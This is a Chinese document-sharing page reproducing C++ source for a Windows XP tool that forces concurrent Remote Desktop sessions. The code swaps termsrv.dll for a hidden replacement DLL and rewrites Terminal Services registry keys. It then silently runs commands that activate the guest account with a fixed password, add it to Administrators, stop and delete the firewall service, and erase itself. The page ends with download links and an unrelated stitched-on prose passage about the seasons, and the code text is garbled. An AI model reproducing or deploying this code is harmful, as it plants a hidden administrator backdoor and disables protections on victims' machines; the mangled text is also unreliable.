xp下双开3389源码.docx
《xp下双开3389源码.docx》由会员分享,可在线阅读,更多相关《xp下双开3389源码.docx(11页珍藏版)》请在冰豆网上搜索。
xp下双开3389源码
//xp3389.cpp:
XP下双开3389的工具CodeByCoolDiyer
#pragmacomment(linker,"/FILEALIGN:
0x200/opt:
nowin98/IGNORE:
4078/MERGE:
.rdata=.text/MERGE:
.data=.text/section:
.text,ERW")
#include"stdafx.h"
#include"resource.h"
#include
#include
DWORDGetProcessId(LPCTSTRszProcName)
{
PROCESSENTRY32pe;
DWORDdwPid;
DWORDdwRet;
BOOLbFound=FALSE;
HANDLEhSP=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSP)
{
pe.dwSize=sizeof(pe);
for(dwRet=Process32First(hSP,&pe);
dwRet
dwRet=Process32Next(hSP,&pe))
{
if(lstrcmpi(szProcName,pe.szExeFile)==0)
{
dwPid=pe.th32ProcessID;
bFound=TRUE;
break;
}
}
CloseHandle(hSP);
if(bFound==TRUE)
{
returndwPid;
}
}
returnNULL;
}
boolCALLBACKEnumWindowsProc(HWNDhwnd,LPARAMlParam)
{
if(!
IsWindowVisible(hwnd))returntrue;
DWORDdwWindowThreadId=NULL;
DWORDdwLsassId=(DWORD)lParam;
GetWindowThreadProcessId(hwnd,&dwWindowThreadId);
if(dwWindowThreadId==(DWORD)lParam)
{
//关闭指定进程的窗口
SendMessage(hwnd,WM_CLOSE,0,0);
}
returntrue;
}
//写注册表的指定键的数据(Mode:
0-新建键数据1-设置键数据2-删除指定键3-删除指定键项)fromNameLess114
intWriteRegEx(HKEYMainKey,LPCTSTRSubKey,LPCTSTRVname,DWORDType,char*szData,DWORDdwData,intMode)
{
HKEYhKey;
DWORDdwDisposition;
intiResult=0;
__try
{
//SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
switch(Mode)
{
case0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition)!
=ERROR_SUCCESS)
__leave;
case1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
switch(Type)
{
caseREG_SZ:
caseREG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1)==ERROR_SUCCESS)
iResult=1;
break;
caseREG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD))==ERROR_SUCCESS)
iResult=1;
break;
caseREG_BINARY:
break;
}
break;
case2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
if(RegDeleteKey(hKey,Vname)==ERROR_SUCCESS)
iResult=1;
break;
case3:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey)!
=ERROR_SUCCESS)
__leave;
if(RegDeleteValue(hKey,Vname)==ERROR_SUCCESS)
iResult=1;
break;
}
}
__finally
{
RegCloseKey(MainKey);
RegCloseKey(hKey);
}
returniResult;
}
boolDebugPrivilege(constchar*PName,BOOLbEnable)
{
BOOLbResult=TRUE;
HANDLEhToken;
TOKEN_PRIVILEGESTokenPrivileges;
if(!
OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES,&hToken))
{
bResult=FALSE;
returnbResult;
}
TokenPrivileges.PrivilegeCount=1;
TokenPrivileges.Privileges[0].Attributes=bEnable?
SE_PRIVILEGE_ENABLED:
0;
LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError()!
=ERROR_SUCCESS)
{
bResult=FALSE;
}
CloseHandle(hToken);
returnbResult;
}
boolUnloadRemoteModule(DWORDdwProcessID,HANDLEhModuleHandle)
{
HANDLEhRemoteThread;
HANDLEhProcess;
if(hModuleHandle==NULL)returnfalse;
hProcess=:
:
OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION,FALSE,dwProcessID);
if(hProcess==NULL)returnfalse;
HMODULEhModule=:
:
GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINEpfnStartRoutine=(LPTHREAD_START_ROUTINE):
:
GetProcAddress(hModule,“FreeLibrary”);
hRemoteThread=:
:
CreateRemoteThread(hProcess,NULL,0,pfnStartRoutine,hModuleHandle,0,NULL);
if(hRemoteThread==NULL)
{
:
:
CloseHandle(hProcess);
returnfalse;
}
:
:
WaitForSingleObject(hRemoteThread,INFINITE);
:
:
CloseHandle(hProcess);
:
:
CloseHandle(hRemoteThread);
returntrue;
}
HANDLEFindModule(DWORDdwProcessID,LPCTSTRlpModulePath)
{
HANDLEhModuleHandle=NULL;
MODULEENTRY32me32={0};
HANDLEhModuleSnap=:
:
CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(:
:
Module32First(hModuleSnap,&me32))
{
do
{
if(!
lstrcmpi(me32.szExePath,lpModulePath))
{
hModuleHandle=me32.hModule;
break;
}
}while(:
:
Module32Next(hModuleSnap,&me32));
}
:
:
CloseHandle(hModuleSnap);
returnhModuleHandle;
}
boolUnloadModule(LPCTSTRlpModulePath)
{
BOOLbRet=false;
PROCESSENTRY32pe32;
pe32.dwSize=sizeof(pe32);
HANDLEhProcessSnap=:
:
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//查找相关的进程
if(:
:
Process32First(hProcessSnap,&pe32))
{
do
{
HANDLEhModuleHandle=FindModule(pe32.th32ProcessID,lpModulePath);
if(hModuleHandle!
=NULL)
{
bRet=UnloadRemoteModule(pe32.th32ProcessID,hModuleHandle);
}
}while(Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
returnbRet;
}
voidStartService(LPCTSTRlpService)
{
SC_HANDLEhSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(NULL!
=hSCManager)
{
SC_HANDLEhService=OpenService(hSCManager,lpService,DELETE|SERVICE_START);
if(NULL!
=hService)
{
StartService(hService,0,NULL);
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCManager);
}
}
BOOLReleaseResource(WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName)
{
HGLOBALhRes;
HRSRChResInfo;
HANDLEhFile;
DWORDdwBytes;
hResInfo=FindResource(NULL,MAKEINTRESOURCE(wResourceID),lpType);
if(hResInfo==NULL)returnFALSE;
hRes=LoadResource(NULL,hResInfo);
if(hRes==NULL)returnFALSE;
hFile=CreateFile(lpFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==NULL)returnFALSE;
WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&dwBytes,NULL);
CloseHandle(hFile);
returnTRUE;
}
voidSetReg()
{
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SOFTWARE//Microsoft//WindowsNT//CurrentVersion//Winlogon”,“KeepRASConnections”,REG_SZ,“1″,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer”,“fDenyTSConnections”,REG_DWORD,NULL,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer//LicensingCore”,“EnableConcurrentSessions”,REG_DWORD,NULL,1,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService//Parameters”,“ServiceDll”,REG_EXPAND_SZ,“%SystemRoot%//system32//termsrvhack.dll”,0,0);
}
voidReleaseDll()
{
charstrSystemPath[MAX_PATH];
charstrDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath,sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath,sizeof(strDllcachePath));
lstrcat(strSystemPath,“//termsrvhack.dll”);
lstrcat(strDllcachePath,“//dllcache//termsrvhack.dll”);
ReleaseResource(IDR_DLL,“BIN”,strSystemPath);
ReleaseResource(IDR_DLL,“BIN”,strDllcachePath);
SetFileAttributes(strSystemPath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
}
boolIsOSXP()
{
OSVERSIONINFOEXOsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO*)&OsVerInfoEx);//注意转换类型
returnOsVerInfoEx.dwMajorVersion==5&&OsVerInfoEx.dwMinorVersion==1;
}
voidHijackService()
{
charstrDll[MAX_PATH];
GetSystemDirectory(strDll,sizeof(strDll));
lstrcat(strDll,“//termsrv.dll”);
//释放termsrvhack.dll
ReleaseDll();
//遍历进程卸载现在加载的DLL
DebugPrivilege(SE_DEBUG_NAME,TRUE);
if(!
UnloadModule(strDll))return;
DebugPrivilege(SE_DEBUG_NAME,FALSE);
//关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框
//对进程赋予关闭权限
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORDdwLsassId=GetProcessId(”csrss.exe”);
while(!
AbortSystemShutdown(NULL))
{
//一些系统是会弹出drwtsn32.exe
DWORDdwDrwtsn32Id=GetProcessId(”drwtsn32.exe”);
if(dwDrwtsn32Id!
=NULL)
{
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwDrwtsn32Id);
}
//模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwLsassId);
Sleep(10);
}
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
}
intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,previousinstance
LPSTRlpCmdLine,intnCmdShow)
{
//一些注册表的操作
SetReg();
if(IsOSXP())
{
//替换DLL
HijackService();
}
//开始终端服务
StartService(”TermService”);
//激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它
charstrCommand[1024];
charstrSelf[MAX_PATH];
GetModuleFileName(NULL,strSelf,sizeof(strSelf));
wsprintf(strCommand,“cmd.exe/cnetuserguest/active:
yes&&netuserguestcooldiyer&&netlocalgroupadministratorsguest/add&&netstopSharedAccess/y&&del/”%s/”&&scdeleteSharedAccess”,strSelf);
WinExec(strCommand,SW_HIDE);
return0;
}
//http:
//201314.free.fr/attachments/200805/xp3389_bin.rar//http:
//201314.free.fr/attachments/200805/xp3389_src.rar
倚窗远眺,目光目光尽处必有一座山,那影影绰绰的黛绿色的影,是春天的颜色。
周遭流岚升腾,没露出那真实的面孔。
面对那流转的薄雾,我会幻想,那里有一个世外桃源。
在天阶夜色凉如水的夏夜,我会静静地,静静地,等待一场流星雨的来临…
许下一个愿望,不乞求去实现,至少,曾经,有那么一刻,我那还未枯萎的,青春的,诗意的心,在我最美的年华里,同星空做了一次灵魂的交流…
秋日里,阳光并不刺眼,天空是一碧如洗的蓝,点缀着飘逸的流云。
偶尔,一片飞舞的落叶,会飘到我的窗前。
斑驳的印迹里,携刻着深秋的颜色。
在一个落雪的晨,这纷纷扬扬的雪,飘落着一如千年前的洁白。
窗外,是未被污染的银白色世界。
我会去迎接,这人间的圣洁。
在这流转的岁月里,有着流转的四季,还有一颗流转的心,亘古不变的心。